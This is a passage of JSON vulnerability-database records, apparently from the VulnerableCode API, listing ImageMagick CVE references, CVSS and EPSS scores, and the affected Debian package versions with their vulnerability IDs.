"", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732282", "reference_id": "1732282", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732282" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931193", "reference_id": "931193", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931193" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-12975" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q3v4-jztv-9bbs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82458?format=api", "vulnerability_id": "VCID-qda9-n7gh-c7c4", "summary": "imagemagick: memory leak vulnerability in function ReadPCLImage in coders/pcl.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12976.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12976.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31584", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31845", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31806", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31771", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31803", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31782", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31752", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32301", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32202", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32263", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32134", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32126", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32175", "published_at": "2026-04-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": 